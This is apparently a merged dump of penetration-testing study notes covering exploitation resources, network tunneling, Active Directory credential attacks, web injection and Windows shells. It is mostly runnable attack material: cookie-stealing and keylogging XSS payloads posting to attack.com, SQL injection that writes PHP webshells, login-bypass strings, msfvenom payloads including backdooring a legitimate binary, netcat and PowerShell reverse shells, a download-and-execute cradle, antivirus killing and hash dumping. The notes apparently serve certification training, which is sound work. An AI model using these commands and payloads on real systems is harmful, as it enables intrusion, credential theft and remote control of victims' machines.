102 | Introduction To Software Exploits   https://opensecuritytraining.info/Exploits1.html   
103 | 
104 | ### Videos 
105 | Binary Exploitation Playlist https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN   
106 | https://www.youtube.com/channel/UCi-IXmtQLrJjg5Ji78DqvAg/videos   
107 | OffensiveCon: https://www.youtube.com/channel/UCMNvAtT4ak2azKNk6UlB1QQ/videos   
108 | HITBSEC Conf: https://www.youtube.com/user/hitbsecconf/videos     
109 | 
110 | ### Blogs:-
111 | http://fuzzysecurity.com/tutorials.html    
112 | https://www.corelan.be/    
113 | https://syedfarazabrar.com/     
114 | https://kileak.github.io   
115 | https://d4mianwayne.github.io/  
116 | https://ctf101.org/binary-exploitation/buffer-overflow/     
117 | https://blog.skullsecurity.org/category/ctfs    
118 | 
119 | ### CTFs   
120 | http://pwnable.kr/   
121 | http://pwnable.tw/      
122 | A collection of pwn/CTF related utilities for Ghidra - https://github.com/0xb0bb/pwndra       
123 | http://pwn.eonew.cn
124 | https://www.root-me.org/?lang=en   
125 | http://smashthestack.org/   
126 | https://exploit.education/  
127 | Some pwn challenges selected for training and education. - https://github.com/BrieflyX/ctf-pwns     
128 | 
129 | ### Related Stuff
130 | PwnTips - https://github.com/Naetw/CTF-pwn-tips    
131 | Quick guide - https://trailofbits.github.io/ctf/exploits/binary1.html   
132 | Pwn Challenge List - https://pastebin.com/uyifxgPu    
133 | 


--------------------------------------------------------------------------------
/Tunneling/README.md:
--------------------------------------------------------------------------------
  1 | # Tunneling      
  2 | ## Contents    
  3 | - [Tunneling](#tunneling)
  4 |   * [Contents](#contents)
  5 |   * [SSH](#ssh)
  6 |     + [Local Tunnels](#local-tunnels)
  7 |     + [Reverse Tunnels](#reverse-tunnels)
  8 |     + [Dynamic Tunnels](#dynamic-tunnels)
  9 |   * [Chisel](#chisel)
 10 |     + [Chisel socks Reverse Proxy](#chisel-socks-reverse-proxy)
 11 |     + [Chisel socks Forward Proxy](#chisel-socks-forward-proxy)
 12 |     + [Chisel Remote Port Forward](#chisel-remote-port-forward)
 13 |     + [Chisel Local Port Forward](#chisel-local-port-forward)
 14 |   * [Metasploit Tunneling](#metasploit-tunneling)
 15 | - [Linux](#linux)
 16 |   * [SShuttle](#sshuttle)
 17 |   * [IPTables](#iptables)
 18 | - [Windows](#windows)
 19 |   * [Portproxy](#portproxy)
 20 |   * [SSH (Window 10 and newer)](#ssh--window-10-and-newer-)
 21 |   * [Plink.exe](#plinkexe)   
 22 |    
 23 | Expose internal services, usually hidden due to firewall rules or gain further access into a network. 
 24 | 
 25 | [Pivot cheat sheet](https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt0f228a4b9a1165e4/5ef3d602395b554cb3523e7b/pivot-cheat-sheet-v1.0.pdf)   
 26 | [Pivoting for Red Teamers](https://artkond.com/2017/03/23/pivoting-guide/)   
 27 | [Basic Tunneling](https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6)  
 28 |  
 29 | ## SSH 
 30 | In SSH session: press enter a few times then ~C to append more tunnels to command (open command line mode). 
 31 | Config file: /etc/ssh/sshd_config. Need to restart SSH service whenever config changes are made.       
 32 | 
 33 |     /usr/sbin/sshd -t    #validate SSH config    
 34 |     systemctl status ssh    #view SSH server status 
 35 |     systemctl restart ssh   #restart SSH 
 36 |     systemctl stop ssh   #stop SSH server 
 37 |     systemctl start ssh   #Start SSH   
 38 | ### Local Tunnels 
 39 | Local tunnel from Kali attack box through a pivot to a service on target. Default local ip is 0.0.0.0
 40 | 
 41 |     ssh -p <port> user@pivot -L <local ip for specific interface>:<local port on attack box>:<target host>:<target port> 
 42 |     ssh -L 3333:localhost:3306 user@10.10.10.10            #local port forward example     
 43 |     ssh -L 3333:localhost:3306 8080:localhost:80 user@10.10.10.10     #multiple local port forward     
 44 |     netstat -antp | grep 3333   #confirm port forward      
 45 |     
 46 | ### Reverse Tunnels
 47 | Remote tunnel to Kali through a pivot from target (may need to join tunnels depending on config)  
 48 | 
 49 |     open up pivot pivot to forward traffic back to local Kali box 
 50 |     ssh -R <pivot port>:localhost:<local port> user@<pivot ip> 
 51 |     
 52 | ### Dynamic Tunnels           
 53 | Set up dynamic tunnels to scan through them (see scanning section below for more details)     
 54 | 
 55 |     ssh -D 9050 user@localhost -p <port on kali used for tunnel> 
 56 | 
 57 |     
 58 |  ## Chisel 
 59 | [Chisel](https://github.com/jpillora/chisel)   
 60 | [Pivoting with Chisel Guide](https://ap3x.github.io/posts/pivoting-with-chisel/)    
 61 | [Chisel Nptes](https://hack.technoherder.com/chisel/)     
 62 | Good for getting through firewalls, need correct copies of binaries on both target / attack box  
 63 | Need to change /etc/proxychains4.conf socks4 to socks5 on attack box    
 64 | [HTTP vs SOCKS4 vs SOCKS5 proxies](https://medium.com/@ThibeauM/difference-between-http-socks4-and-socks5-proxies-85aca2a9e4ae)    
 65 | ### Chisel socks Reverse Proxy 
 66 |     attack box    $ ./chisel server -p LISTEN_PORT --reverse &  
 67 |     target box    $ ./chisel client ATTACKING_IP:LISTEN_PORT R:socks & 
 68 | ### Chisel socks Forward Proxy 
 69 |     target    $ ./chisel server -p LISTEN_PORT --socks5  
 70 |     attack    $ ./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks 
 71 | ### Chisel Remote Port Forward 
 72 |     attack    $ ./chisel server -p LISTEN_PORT --reverse &  
 73 |     target    # ./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT & 
 74 | ### Chisel Local Port Forward 
 75 |     target    $ ./chisel server -p LISTEN_PORT 
 76 |     attack    $ ./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT 
 77 | 
 78 | ## Ligilo-ng     
 79 | [Ligolo-ng](https://github.com/nicocha30/ligolo-ng)    
 80 | 
 81 | ## Metasploit Tunneling   
 82 | Route pivoting:    
 83 | 
 84 |     msf (meter) > bg 
 85 |     msf > route add 10.10.10.0/24 1   #add route to session 1, then scan or exploit using the session     
 86 |     Can then use scanners / commands like: auxiliary/scanner/portscan/tcp, nmap, dn_nmap, post/multi/gather/ping_sweep modules.        
 87 |     msf (meter) > run arp_scanner -r 10.10.10.0/24    
 88 | SOCKS Proxy    
 89 | 
 90 |     use auxiliary/server/socks_proxy
 91 |     socks4 	127.0.0.1 9050    #Add to /etc/proxychains.conf (or proxychains4.conf)    
 92 | Local Port Forwarding    
 93 | 
 94 |     (meter) > portfwd add -l 3300 -p 3389 -r 172.16.1.1    
 95 |     (meter) > portfwd add -R -l 8081 -p 1234 -L 10.10.10.10 #Reverse     
 96 |     
 97 |  # Linux 
 98 |  
 99 |  ## SShuttle
100 |   If pivot is a Linux box with python installed you can ssh into: can use [sshuttle](https://github.com/sshuttle/sshuttle) to connect into network. 
101 |   
102 |       apt-get install sshuttle 
103 |       sshuttle -r user@10.10.10.10 --ssh-cmd "ssh -i id_rsa" 10.10.0.0/24 -x [pivot ip]
104 |  
105 |  ## IPTables 
106 |  
107 |      iptables -t nat -A PREROUTING -p tcp --dport 2222 -j DNAT --to-destination 192.168.0.20:22 
108 | 
109 |  
110 |  # Windows           
111 |      netsh firewall show config 
112 |      netsh advfirewall firewall add rule name="NAME" dir=in action=allow protocol=tcp localport=PORT    
113 | ## Portproxy
114 | 
115 |     netsh interface portproxy add <type> listenport=<port in> connectport=<port out> connectaddress=<destination>  
116 |     <type> can be v4tov4, v4tov6, v6tov4, v6tov6      
117 |     netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8000 connectaddress=10.10.10.100 connectport=80    
118 | 
119 | 
120 | ## SSH (Window 10 and newer)
121 |      [from target box to expose SMB ]
122 |      ssh -l user -pw password -R 445:127.0.0.1:445 YOURIPADDRESS 
123 | ## Plink.exe
124 | [upload plink.exe](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)  
125 | 
126 |      plink.exe -l user -pw password -R 445:127.0.0.1:445 YOURIPADDRESS   <-note entering in your password on a victim box is a bad idea
127 |      
128 |      #generate ssh keys on kali, convert to putty keys and then upload with plink.exe to target         
129 |      sudo apt install putty-tools 
130 |      puttygen KEYFILE -o OUTPUT_KEY.ppk 
131 |      cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N 
132 |  
133 |  # DNS Tunneling    
134 |  [DNSCat2](https://github.com/iagox86/dnscat2)     
135 |  [DNSCat2 - PowerShell](https://github.com/lukebaggett/dnscat2-powershell)      
136 |  
137 |  # ICMP Tunneling   
138 |  [Ptunnel-ng](https://github.com/utoni/ptunnel-ng)    
139 |  
140 |  [SOCKS Over RDP](https://github.com/nccgroup/SocksOverRDP)     
141 |  [Proxifier](https://www.proxifier.com/download/#win-tab)     
142 | 


--------------------------------------------------------------------------------
/ActiveDirectory/Attacks.md:
--------------------------------------------------------------------------------
  1 | # Active Directory Exploitation  
  2 | ## Contents
  3 | - [Active Directory Exploitation](#active-directory-exploitation)
  4 |   * [Contents](#contents)
  5 |   * [NTLM Authentication](#ntlm-authentication)
  6 |     + [Impacket Scripts](#impacket-scripts)
  7 |   * [Kerberos (Port 88)](#kerberos--port-88-)
  8 |   * [Kerberos Attacks](#kerberos-attacks)
  9 |     + [Kerbrute Enumeration](#kerbrute-enumeration)
 10 |     + [Kerberoasting](#kerberoasting)
 11 |     + [AS-REP Roasting with Rubeus and Impacket](#as-rep-roasting-with-rubeus-and-impacket)
 12 |     + [Golden / Silver Ticket Attacks:](#golden---silver-ticket-attacks-)
 13 |     + [Overpass The Hash/Pass The Key (PTK):](#overpass-the-hash-pass-the-key--ptk--)
 14 |     + [Pass the Ticket](#pass-the-ticket)
 15 |     + [Skeleton Key Attacks using Mimikatz](#skeleton-key-attacks-using-mimikatz)
 16 |   * [LDAP (Port 636)](#ldap--port-636-)
 17 |   * [Other Exploits](#other-exploits)
 18 | 
 19 | ## NTLM Authentication
 20 | ### Impacket Scripts  
 21 | psexec.py, smbexec.py, wmiexec.py   
 22 | If you have creds for the backup account for domain controller: can dump all hashes    
 23 | 
 24 |     python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc backup:backuppassword@domain.local
 25 |     
 26 | Use secretsdump.py to dump hashes and hash history from Active Directory database (NTDS.dit) and the SYSTEM registry hive. Password history can be helpful for password reuse attacks.            
 27 | 
 28 |     python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL -outputfile dc-hashes -history     
 29 |     sed -i '/$:/d' dc-hashes.ntds     #remove machine accounts (end with $:)     
 30 |     hashcat -m 1000 -a 0 dc-hashes.ntds ~/path_to_wordlist   #crack NT hashes with a wordlist attack      
 31 |     
 32 | Pass the Hash: use psexec or evil-winrm to login with username/ hash (doesn't need to be cracked)    
 33 | 
 34 |     python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183    
 35 |     evi-winrm -i 127.0.0.1 -u username -H [NTLM hash]   
 36 | 
 37 | ## Kerberos (Port 88)   
 38 | Tools: [Kerbrute](https://github.com/ropnop/kerbrute), [Rubeus](https://github.com/GhostPack/Rubeus)   
 39 | [Messing With Kerberos Using Rubeus](https://endark.gitbook.io/kb/windows/lab-attacks/messing-with-kerberos-using-rubeus) 
 40 | [Kerberos Tickets](https://www.optiv.com/insights/source-zero/blog/kerberos-domains-achilles-heel)   
 41 | [Kerberos Cheat Sheet](https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a)  
 42 | [How Kerberos Works](https://www.tarlogic.com/blog/how-kerberos-works/)  
 43 | 
 44 | 
 45 |     ./kerbrute userenum userlist.txt -d [name] --dc [name]     
 46 |     
 47 | ## Kerberos Attacks 
 48 | 
 49 | Kerbrute Enumeration (No domain access needed) 
 50 | 
 51 | Kerberoasting (Access as any user needed) 
 52 | 
 53 | AS-REP Roasting with Rubeus and Impacket (Access as any user needed)  
 54 | 
 55 | Overpass the Hash / Pass the Key (PTK)  
 56 | 
 57 | Pass the Ticket (Access to user on the domain needed)  
 58 | 
 59 | Golden/Silver Ticket Attacks (krbtgt or domain admin hash needed / Service hash needed) 
 60 | 
 61 | Skeleton key attacks using mimikatz (Domain Admin hneeded) 
 62 | 
 63 | ### Kerbrute Enumeration 
 64 | No domain access needed 
 65 | 
 66 | Kerbrute: https://github.com/ropnop/kerbrute
 67 | /usr/share/wordlists/ADUsers.txt
 68 | 
 69 | ### Kerberoasting  
 70 | Check for Kerberoasting with Impacket -> SPNs 
 71 | 
 72 |     GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john
 73 | 
 74 | Kerberoasting with Impacket
 75 | 
 76 |     python3 GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>  
 77 |     sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip <ip> -request
 78 |      
 79 |  Kerberoasting with Rubeus (install on Windows host in domain) 
 80 |  
 81 |     rubeus.exe kerberoast 
 82 |  
 83 | Crack passwords with hashcat 
 84 | 
 85 |     hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/ADPass.txt
 86 |     13100: kerberos 5, 0: straight attack mode
 87 | 
 88 | ### AS-REP Roasting with Rubeus and Impacket
 89 | Get a list of valid users: ASREProasting to see if any of them do not have pre-auth set and can request a Kerberos ticket without a password. Crack hashes with hashcat        
 90 | 
 91 |     python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py domain.local/ -no-pass -usersfile users.txt         
 92 |      
 93 | 
 94 | ASREPRoast with Impacket:
 95 | 
 96 |     impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
 97 |     impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
 98 | 
 99 | ASREP Roast with Rubeus:
100 | 
101 | ### Golden / Silver Ticket Attacks: 
102 | Golden ticket: use krbtgt password hash to form a Ticket Granting Ticket (allows authentication to any Kerberos service). Abuses root of trust in Kerberos network.    
103 | 
104 | ### Overpass The Hash/Pass The Key (PTK):
105 | Impacket 
106 | 
107 |     python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
108 |     python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
109 |     python3 getTGT.py <domain_name>/<user_name>:[password]
110 | 
111 | ### Pass the Ticket 
112 | Using TGT key to execute remote commands from the following impacket scripts:
113 | 
114 |     python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
115 |     python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
116 |     python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
117 | 
118 | ### Skeleton Key Attacks using Mimikatz 
119 | 
120 | ## LDAP (Port 636)
121 | Anonymous Credential LDAP Dumping: 
122 | 
123 |     ldapsearch -LLL -x -H ldap://<domain fqdn> -b '' -s base '(objectclass=*)'
124 | 
125 | Impacket GetADUsers.py (Must have valid credentials)
126 | 
127 |     GetADUsers.py -all <domain\User> -dc-ip <DC_IP>
128 | 
129 | Impacket lookupsid.py:
130 | 
131 |     /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0
132 | 
133 | Impacket Secretdump:
134 | 
135 |     python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin
136 | 
137 | Windapsearch:
138 | 
139 | https://github.com/ropnop/windapsearch 
140 | 
141 |     python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
142 | 
143 | ## Other Exploits
144 | [Print Nightmare Walkthrough](https://themayor.notion.site/341cf3705cc64752b466046584de45b8?v=4f2173ad749249b293a89ab5391805ec&p=ef69c17e82c5471fb4648ccabbf5c937) 
145 | impersonate DA from standard domain user   
146 | https://github.com/WazeHell/sam-the-admin   
147 | 
148 | Zerologon    
149 | Testing script, use cme to extract the DC name.    
150 | https://github.com/SecuraBV/CVE-2020-1472    
151 | 
152 |     python3 zerologon_tester.py EXAMPLE-DC 1.2.3.4    
153 | Use zer0dump to dump hash of admin password:  
154 |  
155 |     zer0dump.py 192.168.0.5 -port 445    
156 | RCE through pass the hash: 
157 | 
158 |     psexec.py -hashes [hash] Administrator@192.168.0.5   
159 | 


--------------------------------------------------------------------------------
/Web/Command_Injection.md:
--------------------------------------------------------------------------------
  1 | # Command Injection 
  2 | [Payloads](https://github.com/payloadbox)  
  3 | ## Contents 
  4 | - [Contents](#contents)
  5 | - [Inject Input for Code Execution](#inject-input-for-code-execution)
  6 | - [Stored XSS](#stored-xss)
  7 | - [SQL Injection](#sql-injection)
  8 |   * [SQLMAP (Not allowed on OSCP exam but good for labs!)](#sqlmap-not-allowed-on-oscp-exam-but-good-for-labs)
  9 |   * [Manual Testing](#manual-testing)
 10 | 
 11 | ## Inject Input for Code Execution     
 12 | Command seperation / redirection operators:  
 13 | 
 14 |      ; | || & && > >>  
 15 | Substitute operators: 
 16 | 
 17 |     ' $ ()   
 18 | Examples:   
 19 | 
 20 |      text;echo test   #Unix only     
 21 |      echo test|     #Perl inject when open file     
 22 |      text | echo test
 23 |      text || echo test   #run 2nd cmd if error on initial      
 24 |      text & echo test   #initial cmd as bg task     
 25 |      text && echo test   #run 2nd cmd if no error on initial          
 26 |      $(echo test)   #bash specific      
 27 |      'echo test'    #Unix process substitute     
 28 |      >(echo test)    #Unix, process substitute     
 29 |     
 30 | Non blind command injection: 
 31 | 
 32 |     read /etc/passwd or world readables dirs, look for passwords, SSH keys, installed apps.     
 33 | Blind command injection:      
 34 | 
 35 |     run tcpdump on your attack box and inject a ping command (use -c3 for Linux targets so ping doesn't run forever)      
 36 |     Use Burp Collaborator and inject an nslookup command: https://www.tevora.com/threat-blog/blind-command-injection-testing-with-burp-collaborator/     
 37 | 
 38 | Vulnerable PHP functions: system, exec, shell_exec, popen, proc_open, passthru, pcntl_exec    
 39 | 
 40 | ## Stored XSS    
 41 | Stored XSS: Victim gets malicious code after view a webpage.    
 42 | Reflected XSS: code output is reflected in response to a user, common vuln in URL params (GET or POST). Usually needs social engineering as a delivery mechanism.     
 43 | Basic Payload
 44 | 
 45 |      <script>alert("XSS")</script>
 46 | Test Input Fields (html tag <hr>, form elements and GET params)        
 47 | 
 48 |      '';!--"<XSS>=&{ () }     #look for unmodified chars    
 49 | Check for HTTPOnly Cookie Flag (unable to effect cookie with JS)   
 50 | 
 51 |      wget --server-response https://site.com 2>&1 | grep -E "Content-Security-Policy|Set-Cookie"    
 52 | Steal Session Cookie
 53 | 
 54 |     <script>fetch('https://site.com/page?cookie=' + btoa(document.cookie));</script>   
 55 |     <script>document.location='http://attack.com/page.php?c='+document.cookie</script>        
 56 | Record Keys Entered     
 57 | 
 58 |      <script>document.onkeypress = function(e) { fetch('https://site.com/log?key=' + btoa(e.key) );}</script>          
 59 | 
 60 | ## SQL Injection 
 61 | [SQL Injection Cheatsheet](https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md) 
 62 | [Pentestmonkey Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)  
 63 | Enum using nmap
 64 | 
 65 |     nmap -sV --script=http-sql-injection <target>  
 66 |     
 67 | Using jsql 
 68 | 
 69 | ### SQLMAP (Not allowed on OSCP exam but good for labs!) 
 70 | Crawl a page to find sql-injections. Always use a valid non-error generating URL and put the URL in quotes.   
 71 | 
 72 |     sqlmap -u "http://example.com" --crawl=1    
 73 |     sqlmap -u "http://site.org/index.php?vuln_param=1" --dbms=mysql --dbs    #after identifying a vulnerability see database names     
 74 |     sqlmap -u "http://site.org/index.php?vuln_param=1" --dbms=mysql -D database --tables    #get table names from a database       
 75 |     sqlmap -u "http://site.org/index.php?vuln_param=1" --dbms=mysql -D database -T table --dump    #dump table content         
 76 | Used captured HTTP request (use Burp to capture the request then copy it to a text file)   
 77 | 
 78 |     sqlmap -r sqli.txt   
 79 | Custom SQLi        
 80 | 
 81 |     sqlmap -u --data="query" -D [database name] --tables --threads 5 
 82 |     
 83 | Dump database    
 84 | 
 85 |     sqlmap -u "http://172.21.0.0" --dbms=mysql --dump   
 86 | Get a shell 
 87 | 
 88 |     sqlmap -u "http://172.21.0.0" --dbms=mysql --os-shell
 89 | Using sqlmap with login-page  
 90 | 
 91 |     sqlmap -u "https://site.org/sqli/sqli.php?name=Bob" --file-read=/etc/passwd   #read file, if SQL is configured to allow that   
 92 |     sqlmap -r request.txt --dbs    
 93 |     sqlmap -r request.txt -D dbname -T tablename   
 94 |     sqlmap -r request.txt --search -D db_name_search   
 95 |     sqlmap -r request.txt -D nowasp -T credit_cards --dump --start=1 --start=2       #look at 1st 2 records in table Search for usernames and passwords    
 96 |     
 97 |     sqlmap -r request.txt --users --passwords           #find hashes / usernames     
 98 | 
 99 | ### Manual Testing    
100 | try single quote, then double quote, then try with comments     
101 | Comment chars    
102 | 
103 |     ' " % %% -- /* */ // ) ;   
104 | Bypassing login:   
105 |     password' or 1=1;--   
106 |     ' or 1--  
107 |     ' or true;--    
108 | Testing Payloads    
109 | 
110 |     'or 1=1- -
111 |     'or 1=1;-  
112 |     ' or '1'=1
113 |     ' or '1'=1 - -
114 |     '–
115 |     ' or '1'='1
116 |     -'
117 |     ' '
118 |     '&'
119 |     '^'
120 |     '*'
121 |     ' or ''-'
122 |     ' or '' '
123 |     ' or ''&'
124 |     `' or ''^'``
125 |     `' or ''*'
126 |     "-"
127 |     " "
128 |     "&"
129 |     "^"
130 |     "*"
131 |     " or ""-"
132 |     " or "" "
133 |     " or ""&"
134 |     " or ""^"
135 |     " or ""*"
136 |     or true--
137 |     " or true--
138 |     ' or true--
139 |     ") or true--
140 |     ') or true--
141 |     ' or 'x'='x
142 |     ') or ('x')=('x
143 |     ')) or (('x'))=(('x
144 |     " or "x"="x
145 |     ") or ("x")=("x
146 |     ")) or (("x"))=(("x   
147 |     
148 | For a row 
149 | 
150 |     http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8      
151 | Known Username
152 | 
153 |     admin’ - -
154 |     admin’) - -
155 |     
156 | Using error-bases DB enumeration
157 | 
158 |     Add the tick '
159 |     Enumerate columns  
160 |     
161 | Using order by
162 | https://sushant747.gitbooks.io/total-oscp-guide/sql-injections.html
163 | 
164 | Figuring out schema   
165 | MySQL:   
166 | ```
167 | Databases: SELECT schema_name FROM information_schema.schemata   
168 | Tables: SELECT table_name FROM information_schema.tables   
169 | Columns: SELECT column_name FROM information_schema.columns   
170 | ```
171 | enum info
172 | ```
173 | text UNION SELECT 1,@@version,user(),system_user(),database(),3,4,5,6,8,10,11
174 | user() - username and hostname of account, system_user() - account name used by Windows auth     
175 | ```
176 | 
177 | MS SQL Server:   
178 | Note: information_schema can be used for MS SQL Server as well, with some slight, but significant, differences. The queries will need to explicitly reference individual databases because information_schema is a view that provides only info on the current database. Databases: SELECT name FROM sys.databases   
179 | Tables: SELECT name FROM sys.tables    
180 | Columns: SELECT name FROM sys.columns    
181 | 
182 | Oracle:   
183 | Schemas: SELECT owner FROM all_tables   
184 | Tables: SELECT table_name FROM all_tables   
185 | Columns: SELECT column_name FROM all_tab_columns   
186 | 	 
187 |  SQL Injection Webshells
188 |  
189 |      #Linux
190 |      ?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'
191 |      
192 |      #Windows
193 |      ?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
194 | 	
195 | 	
196 | Example SQLi on Windows:
197 | #testing
198 | 
199 |     http://10.10.10.10/debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
200 | 
201 | #exploitation
202 | 
203 |     http://10.10.10.10/debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'    
204 | 
205 | 
206 | More payloads:    
207 | https://github.com/payloadbox/sql-injection-payload-list   
208 | 


--------------------------------------------------------------------------------
/Windows/Windows_Shells.md:
--------------------------------------------------------------------------------
  1 | # Windows Shells 
  2 | ## Contents
  3 | - [Windows Shells](#windows-shells)
  4 |   * [Contents](#contents)
  5 |   * [Checklist](#checklist)
  6 |   * [Test Connection with ping](#test-connection-with-ping)
  7 |   * [Web Shells](#web-shells)
  8 |   * [Reverse Shell Commands](#reverse-shell-commands)
  9 |     + [File Transfers](#file-transfers)
 10 |     + [Msfvenom](#msfvenom)
 11 |     + [Netcat](#netcat)
 12 |     + [Powershell](#powershell)
 13 |     + [Powercat](#powercat)
 14 |     + [Socat](#socat)
 15 |     + [Python](#python)
 16 |     + [Perl](#perl)
 17 |   * [Antivirus Evasion](#antivirus-evasion)
 18 |   * [Resources](#resources)
 19 | 
 20 | ## Checklist 
 21 | Remember to check for AV before uploading common payloads! 
 22 | - [ ] Can you exec .NET commands or Powershell as well? 
 23 | - [ ] Web Shells 
 24 | - [ ] Generate a payload - msfvenom or use nc/socat/powercat
 25 | - [ ] Upload payload and invoke 
 26 | - [ ] Antivirus evasion 
 27 | 
 28 | ## Test Connection with ping  
 29 |     tcpdump -i [interface] icmp   
 30 |     ping 127.0.0.1 
 31 |     powershell -c "Test-Connection 127.0.0.1"
 32 | 
 33 | ## Web Shells 
 34 | [White winter wolf Linux and Windows web shell](https://github.com/WhiteWinterWolf/wwwolf-php-webshell) 
 35 | 
 36 | [Nishang Invoke-Powershell Script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) 
 37 | [ConPty shell](https://github.com/antonioCoco/ConPtyShell)  
 38 | 
 39 | ## Reverse Shell Commands 
 40 | Most likely you will need an exe payload as other payloads aren't usually stable / powershell Execution-Policy is often restricted. 
 41 | Generate exe with msfvenom, upload nc, socat, powercat. Find upload point / code execution point to download and execute. 
 42 | [Reverse Shell Cheatsheet](https://github.com/d4t4s3c/Offensive-Reverse-Shell-Cheat-Sheet)    
 43 | ### File Transfers 
 44 | Upload pages, certutil, powershell
 45 | 
 46 |     powershell Invoke-WebRequest -Uri http://192.168.119.149:8888/nc.exe -OutFile C:\xampp\htdocs\nc.exe  
 47 |     
 48 | ### Msfvenom 
 49 | [Reference](https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/) 
 50 | 
 51 |     msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
 52 |     msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe	
 53 |     msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe	
 54 |     msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
 55 |     msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
 56 |    
 57 | Add a user in windows with msfvenom: 
 58 | 
 59 |     msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe   
 60 |     
 61 | Embed a payload within a legitimate binary:    
 62 | 
 63 |     msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 --platform windows LHOST=10.10.0.10 LPORT=4444 -o tmp.exe -k -x 'Name.exe'   
 64 |     
 65 | ### Meterpreter     
 66 |     
 67 |     help    
 68 | Survey    
 69 | 
 70 |     getuid   
 71 |     ps      	
 72 |     search -f file.txt       
 73 |     shell     
 74 |     runkill av     #turn off AV   
 75 |     load python (or other extension), kiwi    
 76 | Dump Hashes   
 77 | 
 78 |     migrate -N lsass.exe   
 79 |     migrate <pid>    
 80 |     hashdump    
 81 |   
 82 | 
 83 | ### Netcat
 84 | upload static binary nc.exe and invoke 
 85 | 
 86 |     nc.exe -nv 192.168.119.149 53 -e C:\WINDOWS\system32\cmd.exe 
 87 |     
 88 | Persistence: use -L for "listen harder"  
 89 | 
 90 | ### Powershell 
 91 | [Powershell reverse shell scripts](https://github.com/ivan-sincek/powershell-reverse-tcp)  
 92 | 
 93 |     from cmd.exe, run powershell -c "payload"
 94 | 
 95 |     $client = New-Object System.Net.Sockets.TCPClient("192.168.119.149",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 96 |     
 97 |     
 98 |     powershell -exec bypass -c "iwr('http://192.168.0.48:8000/Invoke-PowershellTcp.ps1')|iex" 
 99 | 
100 | Bind shell (run on Windows then connect from Kali)
101 | 
